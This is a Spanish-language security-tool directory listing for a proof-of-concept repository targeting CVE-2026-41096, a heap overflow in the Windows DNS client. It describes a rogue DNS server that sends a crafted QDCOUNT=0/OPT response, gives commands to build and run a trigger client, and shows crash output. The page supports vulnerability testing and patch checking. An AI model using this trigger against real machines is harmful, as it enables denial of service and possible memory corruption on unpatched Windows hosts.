Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41096 — CVE-2026-41096: Desbordamiento de montón en el Cliente DNS de Windows | Kitploit
Herramientas/GitHubGitHub/m0n1x90/cve-2026-41096
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónFuzzingAnálisis de DNSExplotación de Binarios
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

CVE-2026-41096: Desbordamiento de montón en el Cliente DNS de Windows

Ver Repositorio
32hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-41096 - PoC de Crash

Desbordamiento de montón en DnsRawTruncateMessageForUdp() (dnsapi.dll). Una respuesta DNS manipulada con QDCOUNT=0 y un registro OPT grande provoca un desbordamiento de montón de 604 bytes cuando la lógica de truncamiento calcula mal el puntero de destino.

Aviso de MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

Componentes

ArchivoDescripción
rogue_dns_server.pyServidor DNS malicioso (Python 3). Responde a cada consulta con una respuesta QDCOUNT=0 + OPT (623 bytes).
trigger_client.cCliente desencadenante (C/Win32). Llama a DnsQueryRaw apuntando al servidor malicioso. Captura el fallo mediante SetUnhandledExceptionFilter.

Requisitos

Atacante (servidor malicioso):

  • Python 3
  • Root/admin (puerto 53)

Víctima (cliente desencadenante):

  • Sistema operativo Windows con servicio DnsCache (necesita DnsQueryRaw)
  • Versión vulnerable de dnsapi.dll
  • Visual Studio / Windows SDK (para compilar)

Uso

1. Iniciar el servidor malicioso:

root@kitploit:~
sudo python3 rogue_dns_server.py

2. Compilar y ejecutar el cliente desencadenante:

root@kitploit:~
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (Opcional) Habilitar Page Heap para un fallo determinista:

root@kitploit:~
gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

Códigos de salida

CódigoSignificado
0El sistema está parcheado (se devuelve DNS_ERROR_BAD_PACKET limpiamente)
1Error (DnsQueryRaw no encontrado, problema de red, etc.)
2Fallo detectado (desbordamiento de montón confirmado)

Ejemplo de salida

Vulnerable (Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Vulnerable (sin Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Parcheado:

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
Descargar herramienta